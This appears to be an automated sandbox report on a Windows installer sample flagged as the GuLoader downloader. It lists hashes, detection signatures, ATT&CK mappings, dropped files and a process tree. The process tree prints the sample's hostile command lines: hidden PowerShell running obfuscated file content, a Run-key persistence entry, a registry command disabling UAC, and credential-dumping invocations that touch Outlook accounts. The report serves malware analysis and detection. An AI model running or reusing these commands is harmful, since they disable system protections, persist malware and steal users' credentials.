Analysis
- max time kernel: 150s
- max time network: 152s
- platform: windows7_x64
- resource: win7-20240611-en
- resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
- submitted: 28-06-2024 01:51
- Static task static1
- Behavioral task behavioral1: sample d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe, resource win7-20240611-en
- Behavioral task behavioral2: sample d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe, resource win10v2004-20240508-en
- Behavioral task behavioral3: sample $PLUGINSDIR/AdvSplash.dll, resource win7-20240221-en
- Behavioral task behavioral4: sample $PLUGINSDIR/AdvSplash.dll, resource win10v2004-20240508-en
- Behavioral task behavioral5: sample $PLUGINSDIR/BgImage.dll, resource win7-20240508-en
- Behavioral task behavioral6: sample $PLUGINSDIR/BgImage.dll, resource win10v2004-20240508-en
- Behavioral task behavioral7: sample $PLUGINSDIR/UserInfo.dll, resource win7-20240611-en
- Behavioral task behavioral8: sample $PLUGINSDIR/UserInfo.dll, resource win10v2004-20240226-en
- Behavioral task behavioral9: sample $PLUGINSDIR/nsExec.dll, resource win7-20231129-en
- Behavioral task behavioral10: sample $PLUGINSDIR/nsExec.dll, resource win10v2004-20240508-en
General
- Target: d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
- Size: 655KB
- MD5: 76583ad77f92f7c21402dcf6e7a4b613
- SHA1: 8b20685d00b9c729356f8b3d371da03b326e4a80
- SHA256: d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306
- SHA512: 79c4a2621da0707c22a79b472a3a90f34debb6a9e1266ccf6826886646c9a1e495535ff800fccc08ac35531cce4e84f98b5b68afdf25e040bdc3e1720109fced
- SSDEEP: 12288:zsB4GOFNFqtVK+NvRHTLii5BpGH1uF5BhZeizW0Ij3:I4GOnFqrnj5BpkO5/ZjKj3
Malware Config
Signatures
- Guloader,Cloudeye
  A shellcode based downloader first seen in 2020.
-
  Processes:
    description: Set value (int); ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"; process: reg.exe
- Detects executables built or packed with MPress PE compressor 12 IoCs
- Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers 1 IoCs
  Processes:
    resource: behavioral1/memory/984-201-0x0000000000400000-0x0000000000462000-memory.dmp; yara_rule: INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
- Detects executables referencing many email and collaboration clients. Observed in information stealers 1 IoCs
  Processes:
    resource: behavioral1/memory/984-201-0x0000000000400000-0x0000000000462000-memory.dmp; yara_rule: INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
- NirSoft MailPassView 1 IoCs
  Password recovery tool for various email clients
  Processes:
    resource: behavioral1/memory/984-201-0x0000000000400000-0x0000000000462000-memory.dmp; yara_rule: MailPassView
- NirSoft WebBrowserPassView 1 IoCs
  Password recovery tool for various web browsers
  Processes:
    resource: behavioral1/memory/1196-198-0x0000000000400000-0x0000000000478000-memory.dmp; yara_rule: WebBrowserPassView
- Nirsoft 3 IoCs
  Processes:
    resource: behavioral1/memory/2312-203-0x0000000000400000-0x0000000000424000-memory.dmp; yara_rule: Nirsoft
    resource: behavioral1/memory/984-201-0x0000000000400000-0x0000000000462000-memory.dmp; yara_rule: Nirsoft
    resource: behavioral1/memory/1196-198-0x0000000000400000-0x0000000000478000-memory.dmp; yara_rule: Nirsoft
- Blocklisted process makes network request 10 IoCs
  Processes:
    flow: 5, 7, 9, 11, 13, 15, 17, 18, 19, 20; pid: 1940; process: powershell.exe
- Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
  Run Powershell and hide display window.
- Loads dropped DLL 4 IoCs
  Processes:
    pid: 2064; process: d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe (4 entries)
- Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  Processes:
    description: Key opened; ioc: \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts; process: powershell.exe
- Adds Run key to start application 2 TTPs 1 IoCs
  Processes:
    description: Set value (str); ioc: \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\Solosanges = "%Xenoglossia154% -windowstyle minimized $prelocalizations=(Get-ItemProperty -Path 'HKCU:\\Vivans\\').rearrangeret;%Xenoglossia154% ($prelocalizations)"; process: reg.exe
- Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
- Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  Processes:
    pid: 1940; process: powershell.exe (2 entries)
- Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  Processes:
    pid: 1940; process: powershell.exe
- Suspicious use of SetThreadContext 3 IoCs
  Processes:
    description: PID 1940 set thread context of 1196; pid: 1940; process: powershell.exe; target process: powershell.exe
    description: PID 1940 set thread context of 984; pid: 1940; process: powershell.exe; target process: powershell.exe
    description: PID 1940 set thread context of 2312; pid: 1940; process: powershell.exe; target process: powershell.exe
- Drops file in Windows directory 1 IoCs
  Processes:
    description: File opened for modification; ioc: C:\Windows\Fonts\anorakkerne.ini; process: d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
- Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry key 1 TTPs 2 IoCs
- Suspicious behavior: EnumeratesProcesses 10 IoCs
  Processes:
    pid: 1940; process: powershell.exe (8 entries)
    pid: 1196; process: powershell.exe (2 entries)
- Suspicious behavior: MapViewOfSection 3 IoCs
  Processes:
    pid: 1940; process: powershell.exe (3 entries)
- Suspicious use of AdjustPrivilegeToken 2 IoCs
  Processes:
    description: Token: SeDebugPrivilege; pid: 1940; process: powershell.exe
    description: Token: SeDebugPrivilege; pid: 2312; process: powershell.exe
- Suspicious use of SetWindowsHookEx 1 IoCs
  Processes:
    pid: 1940; process: powershell.exe
- Suspicious use of WriteProcessMemory 35 IoCs
  Processes:
    description: PID 2064 wrote to memory of 1940; pid: 2064; process: d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe; target process: powershell.exe (4 entries)
    description: PID 1940 wrote to memory of 2840; pid: 1940; process: powershell.exe; target process: cmd.exe (4 entries)
    description: PID 2840 wrote to memory of 2308; pid: 2840; process: cmd.exe; target process: reg.exe (4 entries)
    description: PID 1940 wrote to memory of 3036; pid: 1940; process: powershell.exe; target process: cmd.exe (4 entries)
    description: PID 3036 wrote to memory of 2208; pid: 3036; process: cmd.exe; target process: reg.exe (4 entries)
    description: PID 1940 wrote to memory of 1196; pid: 1940; process: powershell.exe; target process: powershell.exe (5 entries)
    description: PID 1940 wrote to memory of 984; pid: 1940; process: powershell.exe; target process: powershell.exe (5 entries)
    description: PID 1940 wrote to memory of 2312; pid: 1940; process: powershell.exe; target process: powershell.exe (5 entries)
Processes
- C:\Users\Admin\AppData\Local\Temp\d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe"
  Signatures: Loads dropped DLL; Drops file in Windows directory; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Ammet=Get-Content 'C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Bygningsbestanddels\Kork.Eks';$hesperidate=$Ammet.SubString(3360,3);.$hesperidate($Ammet)"
    Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious use of NtCreateThreadExHideFromDebugger; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Solosanges" /t REG_EXPAND_SZ /d "%Xenoglossia154% -windowstyle minimized $prelocalizations=(Get-ItemProperty -Path 'HKCU:\Vivans\').rearrangeret;%Xenoglossia154% ($prelocalizations)"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Solosanges" /t REG_EXPAND_SZ /d "%Xenoglossia154% -windowstyle minimized $prelocalizations=(Get-ItemProperty -Path 'HKCU:\Vivans\').rearrangeret;%Xenoglossia154% ($prelocalizations)"
        Signatures: Adds Run key to start application; Modifies registry key
    - C:\Windows\SysWOW64\cmd.exe
      Command line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\reg.exe
        Command line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        Signatures: UAC bypass; Modifies registry key
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\iwlibxgvgquqtmko"
      Signatures: Suspicious behavior: EnumeratesProcesses
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\kyrbcprxtymvwayasye"
      Signatures: Accesses Microsoft Outlook accounts
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\uswldicqhgeigguekjrfjj"
      Signatures: Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
Downloads
- C:\ProgramData\remcos\logs.dat
  Filesize: 130B
- C:\Users\Admin\AppData\Local\Temp\iwlibxgvgquqtmko
  Filesize: 2B
- C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Bygningsbestanddels\Kork.Eks
  Filesize: 69KB
- C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Bygningsbestanddels\Pitilessness.Lge211
  Filesize: 337KB
- C:\Users\Admin\Pictures\slukningen.lnk
  Filesize: 976B
- \Users\Admin\AppData\Local\Temp\nsj781E.tmp\AdvSplash.dll
  Filesize: 6KB
- \Users\Admin\AppData\Local\Temp\nsj781E.tmp\BgImage.dll
  Filesize: 7KB
- \Users\Admin\AppData\Local\Temp\nsj781E.tmp\UserInfo.dll
  Filesize: 4KB
- \Users\Admin\AppData\Local\Temp\nsj781E.tmp\nsExec.dll
  Filesize: 6KB